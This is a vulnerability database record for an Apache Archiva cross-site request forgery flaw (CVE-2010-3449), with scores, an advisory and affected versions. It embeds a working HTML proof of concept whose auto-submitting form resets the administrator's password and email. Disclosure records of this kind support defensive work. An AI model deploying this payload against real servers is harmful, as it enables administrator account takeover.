Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-352 |
Cross-Site Request Forgery (CSRF) The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 15710
Publication date : 2010-12-08 23h00 +00:00
Author : Anatolia Security
EDB Verified : Yes
ANATOLIA SECURITY ADVISORY
--------------------------------------
### ADVISORY INFO ###
+ Title: Apache Archiva Cross-site Request Forgery Vulnerability
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
+ Advisory ID: 2010-001
+ Versions: Archiva 1.0 to 1.3.1
+ Date: 29/09/2010
+ CVE-ID: CVE-2010-3449
+ Vendor: The Apache Software Foundation
+ Impact: Gaining Administrator Privileges
+ CWE-ID: 352
+ Credit: Anatolia Security
+ References: http://archiva.apache.org/security.html
### VULNERABLE PRODUCT ###
+ Apache Archiva: "Apache Archiva is an extensible repository management software that helps taking care of your
own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as
Maven, Continuum, and ANT. Archiva offers several capabilities, amongst which remote repository proxying, security
access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning
functionality... and many more!"
+ Homepage: http://archiva.apache.org
### VULNERABILITY DETAILS ###
+ Description: Apache Archiva affects from Cross-site Request Forgery. Application don't check which form sends
credentials. Technically, attacker can create a specially crafted page and force archiva administrators to view it
and change their credentials. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha
and asking old password for action like change password. Vulnerability patched by the Apache Archiva Team.
+ Exploit/POC: http://www.anatoliasecurity.com/exploits/archiva-csrf-poc.txt
<!--
-*-*- ANATOLIA SECURITY (c) 2010 -*-*-
$ Title: Proof of Concept Code for Apache Archiva CSRF
$ ADV-ID: 2010-001
$ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
$ Technical Details: http://www.anatoliasecurity.com
* PoC created by Eliteman
~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com
~ web: elite.anatoliasecurity.com
-->
<html>
<head>
<title> Apache Archiva CSRF PoC </title>
</head>
<body>
<form id="userEditForm" name="useredit" action="http://archiva:8080/archiva/security/useredit.action" method="post">
<input type="hidden" name="user.username" value="admin" id="userEditForm_user_username"/>
<input type="hidden" name="user.fullName" value="OWNED0DAY" id="userEditForm_user_fullName"/>
<input type="hidden" name="user.email" value="0day@zer0day.com" id="userEditForm_user_email"/>
<input type="hidden" name="user.password" value="1337owned" id="userEditForm_user_password"/>
<input type="hidden" name="user.confirmPassword" value="1337owned" id="userEditForm_user_confirmPassword"/>
<input type="hidden" name="user.locked" value="true" id="userEditForm_user_locked"/>
<input type="hidden" name="__checkbox_user.locked" value="true" />
<input type="hidden" name="user.passwordChangeRequired" value="true" id="userEditForm_user_passwordChangeRequired"/>
<input type="hidden" name="__checkbox_user.passwordChangeRequired" value="true" />
<input type="hidden" name="username" value="admin" id="userEditForm_username"/>
<input type="hidden" id="userEditForm__submit" name="method:submit" value="Update"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Jesse_mcconnell>>Redback >> Version To (including) 1.2.3
Jesse_mcconnell>>Redback >> Version 1.0
Jesse_mcconnell>>Redback >> Version 1.0
Jesse_mcconnell>>Redback >> Version 1.0.1
Jesse_mcconnell>>Redback >> Version 1.0.2
Jesse_mcconnell>>Redback >> Version 1.0.3
Jesse_mcconnell>>Redback >> Version 1.1
Jesse_mcconnell>>Redback >> Version 1.1.1
Jesse_mcconnell>>Redback >> Version 1.1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2.1
Jesse_mcconnell>>Redback >> Version 1.2.2
Apache>>Archiva >> Version 1.0
Apache>>Archiva >> Version 1.0.1
Apache>>Archiva >> Version 1.0.2
Apache>>Archiva >> Version 1.0.3
Apache>>Archiva >> Version 1.1
Apache>>Archiva >> Version 1.1.1
Apache>>Archiva >> Version 1.1.2
Apache>>Archiva >> Version 1.1.3
Apache>>Archiva >> Version 1.1.4
Apache>>Archiva >> Version 1.2
Apache>>Archiva >> Version 1.2.1
Apache>>Archiva >> Version 1.2.2
Apache>>Archiva >> Version 1.3
Apache>>Archiva >> Version 1.3.1
References